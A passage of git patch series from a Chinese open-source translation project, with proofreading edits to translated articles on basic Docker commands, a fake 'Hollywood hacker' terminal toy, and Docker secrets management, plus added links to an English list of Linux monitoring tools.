-这里,使用 '-it' 会打开一个 shell 与容器交互。容器启动并运行后,我们就可以像普通机器那样来使用它了,我们可以在容器中执行任何命令。
+这里,使用 `-it` 会打开一个 shell 与容器交互。容器启动并运行后,我们就可以像普通机器那样来使用它了,我们可以在容器中执行任何命令。
### 显示所有的 docker 容器
-要列出所有 docker 容器,运行
+要列出所有 docker 容器,运行:
```
$ docker ps
@@ -133,7 +134,7 @@ $ docker ps
### 停止 docker 容器
-要停止 docker 容器,运行
+要停止 docker 容器,运行:
```
$ docker stop container-id
@@ -141,7 +142,7 @@ $ docker stop container-id
### 从容器中退出
-要从容器中退出,执行
+要从容器中退出,执行:
```
$ exit
@@ -149,25 +150,19 @@ $ exit
### 保存容器状态
-容器运行并更改后后(比如安装了 apache 服务器),我们可以保存容器状态。这会在本地系统上保存新创建镜像。
+容器运行并更改后(比如安装了 apache 服务器),我们可以保存容器状态。这会在本地系统上保存新创建镜像。
-运行下面语句来提交并保存容器状态
+运行下面语句来提交并保存容器状态:
```
$ docker commit 85475ef774 repository/image_name
```
-这里,**commit** 会保存容器状态
-
- **85475ef774**,是容器的容器 id,
-
- **repository**,通常为 docker hub 上的用户名 (或者新加的仓库名称)
-
- **image_name**,新镜像的名称
+这里,`commit` 命令会保存容器状态,`85475ef774`,是容器的容器 id,`repository`,通常为 docker hub 上的用户名 (或者新加的仓库名称)`image_name`,是新镜像的名称。
我们还可以使用 `-m` 和 `-a` 来添加更多信息。通过 `-m`,我们可以留个信息说 apache 服务器已经安装好了,而 `-a` 可以添加作者名称。
- **像这样**
+像这样:
```
docker commit -m "apache server installed"-a "Dan Daniels" 85475ef774 daniels_dan/Cent_container
@@ -182,7 +177,7 @@ via: http://linuxtechlab.com/important-docker-commands-beginners/
作者:[Shusain][a]
译者:[lujun9972](https://github.com/lujun9972)
-校对:[校对者ID](https://github.com/校对者ID)
+校对:[wxy](https://github.com/wxy)
本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
From aad5ca686adc3df0203daa9312c5111c9b453801 Mon Sep 17 00:00:00 2001
From: wxy
Date: Thu, 11 Jan 2018 21:03:39 +0800
Subject: [PATCH 257/371] PRF:20170915 Fake A Hollywood Hacker Screen in Linux
Terminal.md
@Drshu
---
...llywood Hacker Screen in Linux Terminal.md | 35 ++++++++-----------
1 file changed, 15 insertions(+), 20 deletions(-)
diff --git a/translated/tech/20170915 Fake A Hollywood Hacker Screen in Linux Terminal.md b/translated/tech/20170915 Fake A Hollywood Hacker Screen in Linux Terminal.md
index 89d0d17196..d9f7a28ae1 100644
--- a/translated/tech/20170915 Fake A Hollywood Hacker Screen in Linux Terminal.md
+++ b/translated/tech/20170915 Fake A Hollywood Hacker Screen in Linux Terminal.md
@@ -1,16 +1,13 @@
-
-
-# 在 Linux 的终端上伪造一个好莱坞黑客的屏幕
+在 Linux 的终端上伪造一个好莱坞黑客的屏幕
+=============
摘要:这是一个简单的小工具,可以把你的 Linux 终端变为好莱坞风格的黑客入侵的实时画面。
-
-
-我进去了!
+我攻进去了!
你可能会几乎在所有的好莱坞电影里面会听说过这句话,此时的荧幕正在显示着一个入侵的画面。那可能是一个黑色的终端伴随着 ASCII 码、图标和连续不断变化的十六进制编码以及一个黑客正在击打着键盘,仿佛他/她正在打一段愤怒的论坛回复。
-但是那是好莱坞大片!黑客们想要在几分钟之内破解进入一个网络系统除非他花费了几个月的时间来研究它。但是一会儿我将会在旁边留下好莱坞黑客的指责。
+但是那是好莱坞大片!黑客们想要在几分钟之内破解进入一个网络系统除非他花费了几个月的时间来研究它。不过现在我先把对好莱坞黑客的评论放在一边。
因为我们将会做相同的事情,我们将会伪装成为一个好莱坞风格的黑客。
@@ -18,17 +15,16 @@
![在 Linux 上的Hollywood 入侵终端][1]
-看到了吗?就像这样,它甚至在后台播放了一个 Mission Impossible 主题的音乐。此外每次运行这个工具,你都可以获得一个全新且随机的入侵终端
+看到了吗?就像这样,它甚至在后台播放了一个 Mission Impossible 主题的音乐。此外每次运行这个工具,你都可以获得一个全新且随机的入侵的终端。
让我们看看如何在 30 秒之内成为一个好莱坞黑客。
-
### 如何安装 Hollywood 入侵终端在 Linux 之上
-这个工具非常适合叫做 Hollywood 。从根本上说,它运行在 Byobu ——一个基于 Window Manager 的文本,而且它会创建随机数量随机尺寸的分屏,并在上面运行混乱的文字应用。
+这个工具非常适合叫做 Hollywood 。从根本上说,它运行在 Byobu ——一个基于文本的窗口管理器,而且它会创建随机数量、随机尺寸的分屏,并在每个里面运行一个混乱的文字应用。
-Byobu 是一个在 Ubuntu 上由Dustin Kirkland 开发的有趣工具。在其他文章之中还有更多关于它的有趣之处,让我们专心的安装这个工具。
+[Byobu][2] 是一个在 Ubuntu 上由 Dustin Kirkland 开发的有趣工具。在其他文章之中还有更多关于它的有趣之处,让我们先专注于安装这个工具。
Ubuntu 用户可以使用简单的命令安装 Hollywood:
@@ -36,7 +32,7 @@ Ubuntu 用户可以使用简单的命令安装 Hollywood:
sudo apt install hollywood
```
-如果上面的命令不能在你的 Ubuntu 或其他例如 Linux Mint, elementary OS, Zorin OS, Linux Lite 等等基于 Ubuntu 的 Linux 发行版上运行,你可以使用下面的 PPA 来安装:
+如果上面的命令不能在你的 Ubuntu 或其他例如 Linux Mint、elementary OS、Zorin OS、Linux Lite 等等基于 Ubuntu 的 Linux 发行版上运行,你可以使用下面的 PPA 来安装:
```
sudo apt-add-repository ppa:hollywood/ppa
@@ -44,17 +40,17 @@ sudo apt-get update
sudo apt-get install byobu hollywood
```
-你也可以在它的 GitHub 仓库之中获得其源代码:
-
-[Hollywood 在 GitHub][3]
+你也可以在它的 GitHub 仓库之中获得其源代码: [Hollywood 在 GitHub][3] 。
一旦安装好,你可以使用下面的命令运行它,不需要使用 sudo :
-`hollywood`
+```
+hollywood
+```
-因为它会先运行 Byosu ,你将不得不使用 Ctrl+C 两次并再使用 `exit` 命令来停止显示入侵终端的脚本。
+因为它会先运行 Byosu ,你将不得不使用 `Ctrl+C` 两次并再使用 `exit` 命令来停止显示入侵终端的脚本。
-这是一个伪装好莱坞入侵的视频。订阅我们的 YouTube 频道看更多关于 Linux 的有趣视频。
+这里面有一个伪装好莱坞入侵的视频。 https://youtu.be/15-hMt8VZ50
这是一个让你朋友、家人和同事感到吃惊的有趣小工具,甚至你可以在酒吧里给女孩们留下深刻的印象,尽管我不认为这对你在那方面有任何的帮助,
@@ -63,14 +59,13 @@ sudo apt-get install byobu hollywood
如果你知道更多有趣的工具,可以在下面的评论栏里分享给我们。
-
------
via: https://itsfoss.com/hollywood-hacker-screen/
作者:[Abhishek Prakash][a]
译者:[Drshu](https://github.com/Drshu)
-校对:[校对者ID](https://github.com/校对者ID)
+校对:[wxy](https://github.com/wxy)
本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
From cfb5cf733c084df465bf3bc069deca9920453877 Mon Sep 17 00:00:00 2001
From: wxy
Date: Thu, 11 Jan 2018 21:07:48 +0800
Subject: [PATCH 258/371] PUB:20170915 Fake A Hollywood Hacker Screen in Linux
Terminal.md
@Drshu https://linux.cn/article-9228-1.html
---
.../20170915 Fake A Hollywood Hacker Screen in Linux Terminal.md | 0
1 file changed, 0 insertions(+), 0 deletions(-)
rename {translated/tech => published}/20170915 Fake A Hollywood Hacker Screen in Linux Terminal.md (100%)
diff --git a/translated/tech/20170915 Fake A Hollywood Hacker Screen in Linux Terminal.md b/published/20170915 Fake A Hollywood Hacker Screen in Linux Terminal.md
similarity index 100%
rename from translated/tech/20170915 Fake A Hollywood Hacker Screen in Linux Terminal.md
rename to published/20170915 Fake A Hollywood Hacker Screen in Linux Terminal.md
From 8034ab457a51648a9704c012c2f2656eec6644d6 Mon Sep 17 00:00:00 2001
From: darksun
Date: Thu, 11 Jan 2018 21:58:21 +0800
Subject: [PATCH 259/371] update
---
...toring Tools Every SysAdmin Should Know.md | 70 +++++++++++++++++--
1 file changed, 66 insertions(+), 4 deletions(-)
diff --git a/sources/tech/20090627 30 Linux System Monitoring Tools Every SysAdmin Should Know.md b/sources/tech/20090627 30 Linux System Monitoring Tools Every SysAdmin Should Know.md
index 0f8e48c826..bb527d5519 100644
--- a/sources/tech/20090627 30 Linux System Monitoring Tools Every SysAdmin Should Know.md
+++ b/sources/tech/20090627 30 Linux System Monitoring Tools Every SysAdmin Should Know.md
@@ -15,6 +15,8 @@ top command display Linux processes. It provides a dynamic real-time view of a r
![](https://www.cyberciti.biz/tips/wp-content/uploads/2009/06/top-Linux-monitoring-command.jpg)
+Fig.01: Linux top command
+
#### Commonly Used Hot Keys With top Linux monitoring tools
Here is a list of useful hot keys:
@@ -172,15 +174,23 @@ To turn on extra full mode (it will show command line arguments passed to proces
#### Try To Display Only The Process IDs of Lighttpd
-`# ps -C lighttpd -o pid=`
+```
+# ps -C lighttpd -o pid=
+```
OR
-`# pgrep lighttpd`
+```
+# pgrep lighttpd
+```
OR
-`# pgrep -u vivek php-cgi`
+```
+# pgrep -u vivek php-cgi
+```
#### Print The Name of PID 55977
-`# ps -p 55977 -o comm=`
+```
+# ps -p 55977 -o comm=
+```
#### Top 10 Memory Consuming Process
@@ -206,6 +216,11 @@ Mem: 12302896 9739664 2563232 0 523124 5154740
Swap: 1052248 0 1052248
```
+1. [Linux Find Out Virtual Memory PAGESIZE][50]
+2. [Linux Limit CPU Usage Per Process][51]
+3. [How much RAM does my Ubuntu / Fedora Linux desktop PC have?][52]
+
+
### 7. iostat - Montor Linux average CPU load and disk activity
iostat command report Central Processing Unit (CPU) statistics and input/output statistics for devices, partitions and network filesystems (NFS).
@@ -247,6 +262,10 @@ Linux 2.6.18-128.1.14.el5 (www03.nixcraft.in) 06/26/2009
Average: all 2.02 0.00 0.27 0.01 0.00 97.70
```
++ [How to collect Linux system utilization data into a file][53]
++ [How To Create sar Graphs With kSar To Identifying Linux Bottlenecks][54]
+
+
### 9. mpstat - Monitor multiprocessor usage on Linux
mpstat command displays activities for each available processor, processor 0 being the first one. mpstat -P ALL to display average CPU utilization per processor:
@@ -331,6 +350,10 @@ Show all TCP sockets with process SELinux security contexts:
`# ss -t -a -Z `
See the following resources about ss and netstat commands:
++ [ss: Display Linux TCP / UDP Network and Socket Information][56]
++ [Get Detailed Information About Particular IP address Connections Using netstat Command][57]
+
+
### 13. iptraf - Get real-time network statistics on Linux
iptraf command is interactive colorful IP LAN monitor. It is an ncurses-based IP LAN monitor that generates various network statistics including TCP info, UDP counts, ICMP and OSPF information, Ethernet load info, node stats, IP checksum errors, and others. It can provide the following info in easy to read format:
@@ -343,8 +366,12 @@ iptraf command is interactive colorful IP LAN monitor. It is an ncurses-based IP
![Fig.02: General interface statistics: IP traffic statistics by network interface ][9]
+Fig.02: General interface statistics: IP traffic statistics by network interface
+
![Fig.03 Network traffic statistics by TCP connection][10]
+Fig.03 Network traffic statistics by TCP connection
+
[Install IPTraf on a Centos / RHEL / Fedora Linux To Get Network Statistics][11]
### 14. tcpdump - Detailed network traffic analysis
@@ -365,6 +392,7 @@ Use [wireshark to view detailed][12] information about files, enter:
iotop command monitor, I/O usage information, using the Linux kernel. It shows a table of current I/O usage sorted by processes or threads on the server.
`$ sudo iotop`
Sample outputs:
+
![iotop monitoring linux disk read write IO][13]
[Linux iotop: Check What's Stressing And Increasing Load On Your Hard Disks][14]
@@ -377,12 +405,19 @@ Sample outputs:
![htop process viewer for Linux][15]
+[CentOS / RHEL: Install htop An Interactive Text-mode Process Viewer][58]
+
+
### 17. atop - Advanced Linux system & process monitor
atop is a very powerful and an interactive monitor to view the load on a Linux system. It displays the most critical hardware resources from a performance point of view. You can quickly see CPU, memory, disk and network performance. It shows which processes are responsible for the indicated load concerning CPU and memory load on a process level.
`$ atop`
+
![atop Command Line Tools to Monitor Linux Performance][16]
+[CentOS / RHEL: Install atop (Advanced System & Process Monitor) Utility][59]
+
+
### 18. ac and lastcomm -
You must monitor process and login activity on your Linux server. The psacct or acct package contains several utilities for monitoring process activities, including:
@@ -400,10 +435,12 @@ You must monitor process and login activity on your Linux server. The psacct or
Monit is a free and open source software that acts as process supervision. It comes with the ability to restart services which have failed. You can use Systemd, daemontools or any other such tool for the same purpose. [This tutorial shows how to install and configure monit as Process supervision on Debian or Ubuntu Linux][19].
+
### 20. nethogs- Find out PIDs that using most bandwidth on Linux
NetHogs is a small but handy net top tool. It groups bandwidth by process name such as Firefox, wget and so on. If there is a sudden burst of network traffic, start NetHogs. You will see which PID is causing bandwidth surge.
`$ sudo nethogs`
+
![nethogs linux monitoring tools open source][20]
[Linux: See Bandwidth Usage Per Process With Nethogs Tool][21]
@@ -412,18 +449,26 @@ NetHogs is a small but handy net top tool. It groups bandwidth by process name s
iftop command listens to network traffic on a given interface name such as eth0. [It displays a table of current bandwidth usage by pairs of host][22]s.
`$ sudo iftop`
+
![iftop in action][23]
### 22. vnstat - A console-based network traffic monitor
vnstat is easy to use console-based network traffic monitor for Linux. It keeps a log of hourly, daily and monthly network traffic for the selected interface(s).
`$ vnstat `
+
![vnstat linux network traffic monitor][25]
++ [Keeping a Log Of Daily Network Traffic for ADSL or Dedicated Remote Linux Server][60]
++ [CentOS / RHEL: Install vnStat Network Traffic Monitor To Keep a Log Of Daily Traffic][61]
++ [CentOS / RHEL: View Vnstat Graphs Using PHP Web Interface Frontend][62]
+
+
### 23. nmon - Linux systems administrator, tuner, benchmark tool
nmon is a Linux sysadmin's ultimate tool for the tunning purpose. It can show CPU, memory, network, disks, file systems, NFS, top process resources and partition information from the cli.
`$ nmon`
+
![nmon command][26]
[Install and Use nmon Tool To Monitor Linux Systems Performance][27]
@@ -432,6 +477,7 @@ nmon is a Linux sysadmin's ultimate tool for the tunning purpose. It can show CP
glances is an open source cross-platform monitoring tool. It provides tons of information on the small screen. It can also work in client/server mode.
`$ glances`
+
![Glances][28]
[Linux: Keep An Eye On Your System With Glances Monitor][29]
@@ -464,6 +510,8 @@ KSysguard is a network enabled task and system monitor application for KDE deskt
![Fig.05 KDE System Guard][35]
+Fig.05 KDE System Guard {Image credit: Wikipedia}
+
See [the KSysguard handbook][36] for detailed usage.
### 30. Gnome Linux system monitor
@@ -486,6 +534,8 @@ The System Monitor application enables you to display basic system information a
![Fig.06 The Gnome System Monitor application][37]
+Fig.06 The Gnome System Monitor application
+
### Bonus: Additional Tools
A few more tools:
@@ -564,3 +614,15 @@ via: https://www.cyberciti.biz/tips/top-linux-monitoring-tools.html
[45]:https://twitter.com/nixcraft
[46]:https://facebook.com/nixcraft
[47]:https://plus.google.com/+CybercitiBiz
+[50]:https://www.cyberciti.biz/faq/linux-check-the-size-of-pagesize/
+[51]:https://www.cyberciti.biz/faq/cpu-usage-limiter-for-linux/
+[52]:https://www.cyberciti.biz/tips/how-much-ram-does-my-linux-system.html
+[53]:https://www.cyberciti.biz/tips/howto-write-system-utilization-data-to-file.html
+[54]:https://www.cyberciti.biz/tips/identifying-linux-bottlenecks-sar-graphs-with-ksar.html
+[56]:https://www.cyberciti.biz/tips/linux-investigate-sockets-network-connections.html
+[57]:https://www.cyberciti.biz/tips/netstat-command-tutorial-examples.html
+[58]:https://www.cyberciti.biz/faq/centos-redhat-linux-install-htop-command-using-yum/
+[59]:https://www.cyberciti.biz/faq/centos-redhat-linux-install-atop-command-using-yum/
+[60]:https://www.cyberciti.biz/tips/linux-display-bandwidth-usage-on-network-interface-by-host.html
+[61]:https://www.cyberciti.biz/faq/centos-redhat-fedora-linux-install-vnstat-bandwidth-monitor/
+[62]:https://www.cyberciti.biz/faq/centos-redhat-fedora-linux-vnstat-php-webinterface-frontend-config/
From 5d78ff3354d2664498f382825127ece11f52c104 Mon Sep 17 00:00:00 2001
From: imquanquan
Date: Thu, 11 Jan 2018 22:28:23 +0800
Subject: [PATCH 260/371] checked by imquanquan
---
...9 INTRODUCING DOCKER SECRETS MANAGEMENT.md | 32 +++++++++----------
1 file changed, 16 insertions(+), 16 deletions(-)
diff --git a/translated/tech/20170209 INTRODUCING DOCKER SECRETS MANAGEMENT.md b/translated/tech/20170209 INTRODUCING DOCKER SECRETS MANAGEMENT.md
index 0fca78a76f..183e2ef7e3 100644
--- a/translated/tech/20170209 INTRODUCING DOCKER SECRETS MANAGEMENT.md
+++ b/translated/tech/20170209 INTRODUCING DOCKER SECRETS MANAGEMENT.md
@@ -1,42 +1,42 @@
-Dockers 涉密数据(Secrets) 管理介绍
+Dockers 涉密信息(Secrets)管理介绍
====================================
容器正在改变我们对应用程序和基础设施的看法。无论容器内的代码量是大还是小,容器架构都会引起代码如何与硬件相互作用方式的改变 —— 它从根本上将其从基础设施中抽象出来。对于容器安全来说,在 Docker 中,容器的安全性有三个关键组成部分,他们相互作用构成本质上更安全的应用程序。
![Docker Security](https://i2.wp.com/blog.docker.com/wp-content/uploads/e12387a1-ab21-4942-8760-5b1677bc656d-1.jpg?w=1140&ssl=1)
-构建更安全的应用程序的一个关键因素是与其他应用程序和系统进行安全通信,这通常需要证书、tokens、密码和其他类型的验证信息凭证 —— 通常称为应用程序涉密数据。我们很高兴可以推出 Docker 涉密数据,一个容器的原生解决方案,它是加强容器安全的可信赖交付组件,用户可以在容器平台上直接集成涉密数据分发功能。
+构建更安全的应用程序的一个关键因素是与系统和其他应用程序进行安全通信,这通常需要证书、tokens、密码和其他类型的验证信息凭证 —— 通常称为应用程序涉密信息。我们很高兴可以推出 Docker 涉密信息,一个容器的原生解决方案,它是加强容器安全的可信赖交付组件,用户可以在容器平台上直接集成涉密信息分发功能。
-有了容器,现在应用程序在多环境下是动态的、可移植的。这使得现存的涉密数据分发的解决方案略显不足,因为它们都是针对静态环境。不幸的是,这导致了应用程序涉密数据应用不善管理的增加,使得不安全的本地解决方案变得十分普遍,比如像 GitHub 嵌入涉密数据到版本控制系统,或者在这之后考虑了其他同样不好的解决方案。
+有了容器,现在应用程序在多环境下是动态的、可移植的。这使得现存的涉密信息分发的解决方案略显不足,因为它们都是针对静态环境。不幸的是,这导致了应用程序涉密信息管理不善的增加,使得不安全的本地解决方案变得十分普遍,比如像 GitHub 嵌入涉密信息到版本控制系统,或者在这之后考虑了其他同样不好的解决方案。
-### Docker 涉密数据(Secrets) 管理介绍
+### Docker 涉密信息(Secrets)管理介绍
-根本上我们认为,如果有一个标准的接口来访问涉密数据,应用程序就更安全了。任何好的解决方案也必须遵循安全性实践,例如在传输的过程中,对涉密数据进行加密;在空闲的时候也对涉密数据 进行加密;防止涉密数据在应用最终使用时被无意泄露;并严格遵守最低权限原则,即应用程序只能访问所需的涉密数据,不能多也不能不少。
+根本上我们认为,如果有一个标准的接口来访问涉密信息,应用程序就更安全了。任何好的解决方案也必须遵循安全性实践,例如在传输的过程中,对涉密信息进行加密;在空余的时候也对涉密数据进行加密;防止涉密信息在应用最终使用时被无意泄露;并严格遵守最低权限原则,即应用程序只能访问所需的涉密信息,不能多也不能不少。
-通过将涉密数据整合到 docker 的业务流程,我们能够在遵循这些确切的原则下为涉密数据的管理问题提供一种解决方案。
+通过将涉密信息整合到 Docker 的业务流程,我们能够在遵循这些确切的原则下为涉密信息的管理问题提供一种解决方案。
-下图提供了一个高层次视图,并展示了 Docker swarm mode 体系架构是如何将一种新类型的对象 —— 一个涉密数据对象,安全地传递给我们的容器。
+下图提供了一个高层次视图,并展示了 Docker swarm mode 体系架构是如何将一种新类型的对象 —— 一个涉密信息对象,安全地传递给我们的容器。
![Docker Secrets Management](https://i0.wp.com/blog.docker.com/wp-content/uploads/b69d2410-9e25-44d8-aa2d-f67b795ff5e3.jpg?w=1140&ssl=1)
-在 Docker 中,一个涉密数据是任意的数据块,比如密码、SSH 密钥、TLS 凭证,或者任何其他本质上敏感的数据。当你将一个涉密数据加入集群(通过执行 `docker secret create` )时,利用在引导新集群时自动创建的内置证书颁发机构,Docker 通过相互认证的 TLS 连接将密钥发送给集群管理器。
+在 Docker 中,一个涉密信息是任意的数据块,比如密码、SSH 密钥、TLS 凭证,或者任何其他本质上敏感的数据。当你将一个涉密信息加入集群(通过执行 `docker secret create` )时,利用在引导新集群时自动创建的内置证书颁发机构,Docker 通过相互认证的 TLS 连接将密钥发送给集群管理器。
```
$ echo "This is a secret" | docker secret create my_secret_data -
```
-一旦,涉密数据到达一个管理节点,它将被保存到内部的 Raft 存储区中,该存储区使用 NACL 开源加密库中的 Salsa20、Poly1305 加密算法生成的 256 位密钥进行加密。以确保没有任何数据被永久写入未加密的磁盘。向内部存储写入涉密数据,给予了涉密数据跟其他集群数据一样的高可用性。
+一旦,涉密信息到达某个管理节点,它将被保存到内部的 Raft 存储区中,该存储区使用 NACL 开源加密库中的 Salsa20、Poly1305 加密算法生成的 256 位密钥进行加密。以确保没有把任何涉密信息数据永久写入未加密的磁盘。向内部存储写入涉密信息,赋予了涉密信息跟其他集群数据一样的高可用性。
-当集群管理器启动的时,包含 涉密数据 的被加密过的 Raft 日志通过每一个节点唯一的数据密钥进行解密。此密钥以及用于与集群其余部分通信的节点的 TLS 证书可以使用一个集群范围的加密密钥进行加密。该密钥称为“解锁密钥”,也使用 Raft 进行传播,将且会在管理器启动的时候被使用。
+当集群管理器启动的时,包含涉密信息的被加密过的 Raft 日志通过每一个节点唯一的数据密钥进行解密。此密钥以及用于与集群其余部分通信的节点的 TLS 证书可以使用一个集群范围的加密密钥进行加密。该密钥称为“解锁密钥”,也使用 Raft 进行传递,将且会在管理器启动的时候使用。
-当授予新创建或运行的服务权限访问某个涉密数据时,其中一个管理器节点(只有管理人员可以访问被存储的所有涉密数据),将已建立的 TLS 连接分发给正在运行特定服务的节点。这意味着节点自己不能请求涉密数据,并且只有在管理员提供给他们的时候才能访问这些涉密数据 —— 严格地控制请求涉密数据的服务。
+当授予新创建或运行的服务权限访问某个涉密信息权限时,其中一个管理器节点(只有管理人员可以访问被存储的所有涉密数据),将已建立的 TLS 连接分发给正在运行特定服务的节点。这意味着节点自己不能请求涉密数据,并且只有在管理员提供给他们的时候才能访问这些涉密数据 —— 严格地控制请求涉密数据的服务。
```
$ docker service create --name="redis" --secret="my_secret_data" redis:alpine
```
-未加密的涉密数据被挂载到一个容器,该容器位于 `/run/secrets/` 的内存文件系统中。
+未加密的涉密信息被挂载到一个容器,该容器位于 `/run/secrets/` 的内存文件系统中。
```
$ docker exec $(docker ps --filter name=redis -q) ls -l /run/secrets
@@ -44,7 +44,7 @@ total 4
-r--r--r-- 1 root root 17 Dec 13 22:48 my_secret_data
```
-如果一个服务被删除或者被重新安排在其他地方,集群管理器将立即通知所有不再需要访问该涉密数据的节点,这些节点将不再有权访问该应用程序的涉密数据。
+如果一个服务被删除或者被重新安排在其他地方,集群管理器将立即通知所有不再需要访问该涉密信息的节点,这些节点将不再有权访问该应用程序的涉密信息。
```
$ docker service update --secret-rm="my_secret_data" redis
@@ -54,7 +54,7 @@ $ docker exec -it $(docker ps --filter name=redis -q) cat /run/secrets/my_secret
cat: can't open '/run/secrets/my_secret_data': No such file or directory
```
-查看 Docker secret 文档以获取更多信息和示例,了解如何创建和管理您的涉密数据。同时,特别推荐 Docker 安全合作团 Laurens Van Houtven (https://www.lvh.io/) 和使这一特性成为现实的团队。
+查看 Docker secret 文档以获取更多信息和示例,了解如何创建和管理您的涉密信息。同时,特别推荐 Docker 安全合作团 Laurens Van Houtven (https://www.lvh.io/) 和使这一特性成为现实的团队。
[Get safer apps for dev and ops w/ new #Docker secrets management][5]
@@ -65,7 +65,7 @@ cat: can't open '/run/secrets/my_secret_data': No such file or directory
### 通过 Docker 更安全地使用应用程序
-Docker 涉密数据旨在让开发人员和 IT 运营团队可以轻松使用,以用于构建和运行更安全的应用程序。它是是首个被设计为既能保持涉密数据安全又能仅在当被需要涉密数据操作的确切容器需要的使用的容器结构。从使用 Docker Compose 定义应用程序和涉密数据,到 IT 管理人员直接在 Docker Datacenter 中部署的 Compose 文件、涉密数据,networks 和 volumes 都将被加密并安全地跟应用程序一起传输。
+Docker 涉密信息旨在让开发人员和 IT 运营团队可以轻松使用,以用于构建和运行更安全的应用程序。它是是首个被设计为既能保持涉密信息安全,并且仅在特定的容器需要它来进行必要的涉密信息操作的时候使用。从使用 Docker Compose 定义应用程序和涉密数据,到 IT 管理人员直接在 Docker Datacenter 中部署的 Compose 文件、涉密信息,networks 和 volumes 都将被加密并安全地跟应用程序一起传输。
更多相关学习资源:
@@ -85,7 +85,7 @@ via: https://blog.docker.com/2017/02/docker-secrets-management/
作者:[ Ying Li][a]
译者:[HardworkFish](https://github.com/HardworkFish)
-校对:[校对者ID](https://github.com/校对者ID)
+校对:[imquanquan](https://github.com/imquanquan)
本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
From edd0131b3007da453617e8976bc79bab5a13c566 Mon Sep 17 00:00:00 2001
From: imquanquan
Date: Thu, 11 Jan 2018 22:38:40 +0800
Subject: [PATCH 261/371] checked by imquanquan
---
.../20170209 INTRODUCING DOCKER SECRETS MANAGEMENT.md | 8 ++++----
1 file changed, 4 insertions(+), 4 deletions(-)
diff --git a/translated/tech/20170209 INTRODUCING DOCKER SECRETS MANAGEMENT.md b/translated/tech/20170209 INTRODUCING DOCKER SECRETS MANAGEMENT.md
index 183e2ef7e3..418a43bd00 100644
--- a/translated/tech/20170209 INTRODUCING DOCKER SECRETS MANAGEMENT.md
+++ b/translated/tech/20170209 INTRODUCING DOCKER SECRETS MANAGEMENT.md
@@ -8,7 +8,7 @@ Dockers 涉密信息(Secrets)管理介绍
构建更安全的应用程序的一个关键因素是与系统和其他应用程序进行安全通信,这通常需要证书、tokens、密码和其他类型的验证信息凭证 —— 通常称为应用程序涉密信息。我们很高兴可以推出 Docker 涉密信息,一个容器的原生解决方案,它是加强容器安全的可信赖交付组件,用户可以在容器平台上直接集成涉密信息分发功能。
-有了容器,现在应用程序在多环境下是动态的、可移植的。这使得现存的涉密信息分发的解决方案略显不足,因为它们都是针对静态环境。不幸的是,这导致了应用程序涉密信息管理不善的增加,使得不安全的本地解决方案变得十分普遍,比如像 GitHub 嵌入涉密信息到版本控制系统,或者在这之后考虑了其他同样不好的解决方案。
+有了容器,现在应用程序在多环境下是动态的、可移植的。这使得现存的涉密信息分发的解决方案略显不足,因为它们都是针对静态环境。不幸的是,这导致了应用程序涉密信息管理不善的增加,使得不安全的本地解决方案变得十分普遍,比如像 GitHub 将嵌入涉密信息到版本控制系统,或者在这之后考虑了其他同样不好的解决方案。
### Docker 涉密信息(Secrets)管理介绍
@@ -26,11 +26,11 @@ Dockers 涉密信息(Secrets)管理介绍
$ echo "This is a secret" | docker secret create my_secret_data -
```
-一旦,涉密信息到达某个管理节点,它将被保存到内部的 Raft 存储区中,该存储区使用 NACL 开源加密库中的 Salsa20、Poly1305 加密算法生成的 256 位密钥进行加密。以确保没有把任何涉密信息数据永久写入未加密的磁盘。向内部存储写入涉密信息,赋予了涉密信息跟其他集群数据一样的高可用性。
+一旦,涉密信息到达某个管理节点,它将被保存到内部的 Raft 存储区中。该存储区使用 NACL 开源加密库中的 Salsa20、Poly1305 加密算法生成的 256 位密钥进行加密,以确保没有把任何涉密信息数据永久写入未加密的磁盘。向内部存储写入涉密信息,赋予了涉密信息跟其他集群数据一样的高可用性。
当集群管理器启动的时,包含涉密信息的被加密过的 Raft 日志通过每一个节点唯一的数据密钥进行解密。此密钥以及用于与集群其余部分通信的节点的 TLS 证书可以使用一个集群范围的加密密钥进行加密。该密钥称为“解锁密钥”,也使用 Raft 进行传递,将且会在管理器启动的时候使用。
-当授予新创建或运行的服务权限访问某个涉密信息权限时,其中一个管理器节点(只有管理人员可以访问被存储的所有涉密数据),将已建立的 TLS 连接分发给正在运行特定服务的节点。这意味着节点自己不能请求涉密数据,并且只有在管理员提供给他们的时候才能访问这些涉密数据 —— 严格地控制请求涉密数据的服务。
+当授予新创建或运行的服务权限访问某个涉密信息权限时,其中一个管理器节点(只有管理员可以访问被存储的所有涉密信息)会通过已经建立的TLS连接将其分发给正在运行特定服务的节点。这意味着节点自己不能请求涉密信息,并且只有在管理员提供给他们的时候才能访问这些涉密信息 —— 严格地控制请求涉密信息的服务。
```
$ docker service create --name="redis" --secret="my_secret_data" redis:alpine
@@ -54,7 +54,7 @@ $ docker exec -it $(docker ps --filter name=redis -q) cat /run/secrets/my_secret
cat: can't open '/run/secrets/my_secret_data': No such file or directory
```
-查看 Docker secret 文档以获取更多信息和示例,了解如何创建和管理您的涉密信息。同时,特别推荐 Docker 安全合作团 Laurens Van Houtven (https://www.lvh.io/) 和使这一特性成为现实的团队。
+查看 Docker Secret 文档以获取更多信息和示例,了解如何创建和管理您的涉密信息。同时,特别推荐 Docker 安全合作团 Laurens Van Houtven (https://www.lvh.io/) 和使这一特性成为现实的团队。
[Get safer apps for dev and ops w/ new #Docker secrets management][5]
From 81f285a563f92461d62d22cd490b361d0597287b Mon Sep 17 00:00:00 2001
From: geekpi
Date: Fri, 12 Jan 2018 08:56:29 +0800
Subject: [PATCH 262/371] translated
---
...nese Language Environment In Arch Linux.md | 100 ------------------
...nese Language Environment In Arch Linux.md | 99 +++++++++++++++++
2 files changed, 99 insertions(+), 100 deletions(-)
delete mode 100644 sources/tech/20171108 How To Setup Japanese Language Environment In Arch Linux.md
create mode 100644 translated/tech/20171108 How To Setup Japanese Language Environment In Arch Linux.md
diff --git a/sources/tech/20171108 How To Setup Japanese Language Environment In Arch Linux.md b/sources/tech/20171108 How To Setup Japanese Language Environment In Arch Linux.md
deleted file mode 100644
index 0ccd924700..0000000000
--- a/sources/tech/20171108 How To Setup Japanese Language Environment In Arch Linux.md
+++ /dev/null
@@ -1,100 +0,0 @@
-translating---geekpi
-
-How To Setup Japanese Language Environment In Arch Linux
-======
-
